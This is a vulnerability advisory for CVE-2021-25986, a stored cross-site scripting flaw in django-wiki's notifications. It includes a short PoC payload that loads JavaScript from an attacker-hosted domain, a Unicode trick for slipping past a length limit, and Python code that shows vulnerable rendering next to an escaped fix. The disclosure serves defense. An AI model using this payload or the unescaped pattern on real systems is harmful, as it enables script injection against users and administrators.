
CVE-2021-25986

Date: November 23, 2021

Overview

Django-wiki versions 0.0.20 to 0.7.8 are vulnerable to Stored Cross-Site Scripting (XSS) in the Notifications section. An attacker who has permission to edit pages can inject a JavaScript payload into the title field. When a victim receives a notification about the changes made in the application, the payload renders in the notification panel and loads external JavaScript.

Details

The Django-wiki application is vulnerable to Stored Cross-Site Scripting (XSS) in the Notifications section. An attacker who has permission to edit pages can inject a JavaScript payload into the title field. When a victim receives a notification about the changes made in the application, the payload renders in the notification panel and loads external JavaScript.

PoC Details

Log in to the application as a non-admin user and select any page (e.g. a test page) on which that user has edit permissions. Insert the JavaScript payload (shown below) into the title parameter. Log in from another browser as an admin and observe the notification bar at the top. When the victim receives the notification update, the payload is triggered and loads the external JavaScript into the application. The JavaScript payload used was less than 25 characters, because the code truncates the title parameter when it is longer than 25 characters. In addition, the Unicode character “℡”, which the application counts as a single character but the browser renders as the three characters “TEL” because of Unicode compatibility, is used to form a domain name of the minimum length of 3 characters. Content of the file “a.js” hosted on the attacker's server.

PoC Code

<script src=//℡z.in/a.js>
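As an added illustration (not django-wiki's own code), the Python below mirrors the two details the PoC relies on: the notification title is cut to 25 characters and, in the vulnerable pattern, interpolated into HTML unescaped, while the hardened form escapes it after truncation. The notification markup, the function names and the 25-character constant as written here are assumptions; only the PoC title comes from the advisory.

```python
import html
import unicodedata

# Constructed example, not django-wiki's code. The 25-character limit mirrors
# the truncation the advisory describes; the HTML snippet is an assumption.
TITLE_MAX_LEN = 25

# The advisory's PoC title, reused here as the sample input.
POC_TITLE = "<script src=//℡z.in/a.js>"


def truncate_title(title: str) -> str:
    """Cut the raw title to TITLE_MAX_LEN code points, as the application does."""
    return title[:TITLE_MAX_LEN]


def render_notification_vulnerable(title: str) -> str:
    """The pattern behind CVE-2021-25986: the title is placed in the
    notification markup without escaping, so a tag in it becomes live HTML."""
    return '<li class="notification">Page changed: ' + truncate_title(title) + "</li>"


def render_notification_fixed(title: str) -> str:
    """Hardened form: escape the title after truncating it (escaping first and
    truncating afterwards could cut an entity like &lt; in half), so the title
    is always shown as text, never parsed as markup."""
    return ('<li class="notification">Page changed: '
            + html.escape(truncate_title(title), quote=True) + "</li>")


def rendered_length(text: str) -> int:
    """Length after NFKC compatibility normalisation. This is why the length
    limit is no defence: ℡ (U+2121) is one code point to Python, but the
    browser renders it as the three ASCII letters TEL."""
    return len(unicodedata.normalize("NFKC", text))


def contains_script_tag(markup: str) -> bool:
    """Crude check for a regression test or a scan of rendered notifications."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(len(POC_TITLE), rendered_length(POC_TITLE))   # 25 27
    print(render_notification_vulnerable(POC_TITLE))
    print(render_notification_fixed(POC_TITLE))
```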

Affected Environments

0.0.20 to 0.7.8

Prevention

Upgrade to version 0.7.9 or later

Language: Python

Good to know:


Cross-Site Scripting (XSS)

CWE-79

Upgrade Version

Upgrade wiki to version 0.7.9


Base Score (CVSS v3 metrics):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score (CVSS v2 metrics):
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None